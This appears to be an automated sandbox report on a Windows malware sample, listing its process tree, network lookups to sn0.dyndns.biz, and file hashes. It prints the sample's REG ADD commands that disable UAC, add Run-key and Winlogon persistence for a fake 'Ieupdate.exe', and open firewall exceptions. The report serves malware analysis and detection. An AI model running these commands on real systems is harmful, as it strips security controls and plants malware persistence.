PID 2056 wrote to memory of 4444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2056 wrote to memory of 4444 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2672 wrote to memory of 1008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2672 wrote to memory of 1008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 2672 wrote to memory of 1008 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe

Processes

C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe

"C:\Users\Admin\AppData\Local\Temp\65c6a5b9b13ea0c5eacc74fa52677101fd3bbe91fbdac8521726c76b657b2410.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JNYVYK.bat" "

C:\Windows\SysWOW64\reg.exe

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center /v UACDisableNotify /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\reg.exe

REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dVBuy.bat" "

C:\Windows\SysWOW64\reg.exe

REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "IeUpdate" /t REG_SZ /d "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe" /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\nrMkX.bat" "

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "IeUpdate" /t REG_SZ /d "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe" /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xqZTD.bat" "

C:\Windows\SysWOW64\reg.exe

REG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "Explorer.exe, C:\Program Files (x86)\Internet Explorer\Ieupdate.exe" /f

C:\Program Files (x86)\Internet Explorer\Ieupdate.exe

"C:\Program Files (x86)\Internet Explorer\Ieupdate.exe"

C:\Program Files (x86)\Internet Explorer\Ieupdate.exe

"C:\Program Files (x86)\Internet Explorer\Ieupdate.exe"

C:\Program Files (x86)\Internet Explorer\Ieupdate.exe

"C:\Program Files (x86)\Internet Explorer\Ieupdate.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\cmd.exe

cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe" /t REG_SZ /d "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe:*:Enabled:Windows Messanger" /f

C:\Windows\SysWOW64\cmd.exe

cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\cmd.exe

cmd /c REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Users\Admin\AppData\Roaming\vb6.exe" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\vb6.exe:*:Enabled:Windows Messanger" /f

C:\Windows\SysWOW64\reg.exe

REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Users\Admin\AppData\Roaming\vb6.exe" /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\vb6.exe:*:Enabled:Windows Messanger" /f

C:\Windows\SysWOW64\reg.exe

REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile /v "DoNotAllowExceptions" /t REG_DWORD /d "0" /f

C:\Windows\SysWOW64\reg.exe

REG ADD HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List /v "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe" /t REG_SZ /d "C:\Program Files (x86)\Internet Explorer\Ieupdate.exe:*:Enabled:Windows Messanger" /f

Network

Country Destination Domain Proto
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 sn0.dyndns.biz udp
GB 95.101.143.195:443 www.bing.com tcp
US 8.8.8.8:53 195.143.101.95.in-addr.arpa udp
US 8.8.8.8:53 sn0.dyndns.biz udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 sn0.dyndns.biz udp
US 8.8.8.8:53 167.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 sn0.dyndns.biz udp
US 8.8.8.8:53 sn0.dyndns.biz udp
US 8.8.8.8:53 sn0.dyndns.biz udp
US 8.8.8.8:53 sn0.dyndns.biz udp
US 8.8.8.8:53 sn0.dyndns.biz udp
US 8.8.8.8:53 sn0.dyndns.biz udp
US 8.8.8.8:53 sn0.dyndns.biz udp

Files

memory/4596-0-0x0000000000400000-0x00000000005A5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\JNYVYK.txt

MD5 9fcec2a4ee61953e0d4867261a39ea32
SHA1 d552acf26d9fcc31a9da82ecce503b16a11e9d2a
SHA256 24c5da914d1f429c07ef17dfb7d4d0c90eb060e5a9bd009963fba83b1dd6cae3
SHA512 57d8a88138645780357a88658f21f833efa0ba657dd1fefa6458ba930731e1949216b518f26ab995241837bc7e6eff90b46e5cb5ec34364d2f89db09779e5564

C:\Users\Admin\AppData\Local\Temp\dVBuy.bat

MD5 5d73853d695283e13b412c88ec62984c
SHA1 672379399a80a746a8f0d8043bbf98956101d0ca
SHA256 59884297b763a498c1f55e4ba57f04597ab37677feb9b686839e7553942cf335
SHA512 9043d02ec14cc4869cc8c01562838c11448e2bff42af32ec0a60de76fa8915c3a3a50529ce567c6cb93d2691525b38862257993674c263ed25f6625e370cb2d2

C:\Users\Admin\AppData\Local\Temp\nrMkX.bat

MD5 3d470539cbafa762cdb72a4635ad553d
SHA1 4bda3e7de91052dc7d073d8b278ad09ad0d10fa6
SHA256 9f0571e3567d7e1849c7bd5dd7b7a2be942ec44aea6c8bb32d415874b7282691
SHA512 42b168fabd5ddd175ccd143d4f9338880aad03eb22d07fb8a2e13f387015b9eb1d23307bff3ae370c95a5644c88c5e9f7c8b12b332b595c79be069ffc92a448e

C:\Users\Admin\AppData\Local\Temp\xqZTD.bat

MD5 09d67635a7674b12183c3f0668ce0cd1
SHA1 c3fe2225cc5198a1c33df0342a95528c2e657a6d
SHA256 972e896e8649a5d2caf286a0d75db99909587b1d2f4683870207b547c3bc02d9
SHA512 b37bdad4fb0e9ab947ea5750337de073907d31156d0d00a1a79392741ced2d1aabf1cc2d92581d7f068266f82cd5b2c10fd7e5c573044e6ce77dea6da6dde321

C:\Program Files (x86)\Internet Explorer\Ieupdate.txt

MD5 a94c5de11a9047cd4d73251cfe574ba7
SHA1 0cf65ad49fd994a2133603759438324c95849e8d
SHA256 40fd483d6a35c6982c61f16a76f1b0781532836e34c957c26fcec3c60809dd34
SHA512 f317611ea39e8ed66c775063af615abca2c4a56653d7d507b234c6e7b169ecadc8803eb381cc7edbf09ca0dda8b9813214ead3cd7383d443627a13caf4a89396

memory/1292-55-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1292-57-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1292-59-0x0000000000400000-0x000000000045C000-memory.dmp

memory/4768-63-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4768-69-0x0000000000400000-0x0000000000409000-memory.dmp

memory/4768-70-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1292-73-0x0000000000400000-0x000000000045C000-memory.dmp

memory/4768-77-0x0000000000400000-0x0000000000409000-memory.dmp

memory/1292-78-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1292-83-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1292-87-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1292-91-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1292-95-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1292-99-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1292-103-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1292-107-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1292-115-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1292-119-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1292-123-0x0000000000400000-0x000000000045C000-memory.dmp

memory/1292-127-0x0000000000400000-0x000000000045C000-memory.dmp